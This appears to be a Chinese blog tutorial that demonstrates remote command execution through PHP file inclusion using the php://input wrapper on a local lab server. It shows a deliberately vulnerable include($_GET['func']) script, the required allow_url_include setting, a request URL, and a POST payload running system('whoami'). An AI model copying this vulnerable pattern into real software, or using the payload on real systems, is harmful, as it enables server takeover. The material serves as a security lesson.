php文件报告 php内置协议 访问cmd执行系统命令

这个漏洞需要有前提条件的  需要修改php.ini  一个参数才可以执行漏洞 

修改allow_url_include = On  这样在配合php文件包含 php内置协议 就可以执行漏洞了 


修改完成 重启apache  接着查看我们服务器php文件源代码


万年不变源代码

<?php
if ($_GET['func']) {
   include $_GET['func'];
} else {
   include 'default.php';
}
?>

使用浏览器打开网站

http://192.168.1.106/test_php_local/index.php?func=php:\\input



报错 到这里还不能确定有没有php内置协议漏洞  接着往下看   

下面我有用burp抓取数据包


看到没有  使用burp 没有返回信息  说明可能有这个漏洞

直接上命令

<?php system("whoami"); ?>



ok系统命令执行了   存在漏洞


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值